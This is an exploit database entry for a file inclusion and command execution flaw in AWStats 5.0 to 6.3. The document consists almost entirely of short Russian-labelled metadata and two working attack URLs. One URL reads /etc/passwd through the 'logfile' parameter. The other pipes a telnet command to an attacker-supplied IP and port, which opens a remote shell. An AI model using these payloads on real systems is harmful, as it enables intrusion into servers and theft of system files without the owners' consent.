Exploit AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution

[Exploiter]

EDB-ID

407

Проверка EDB

1. Пройдено

Автор

JOHNATHAN BAT

Тип уязвимости

WEBAPPS

Платформа

CGI

CVE

null

Дата публикации

2004-08-21

Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]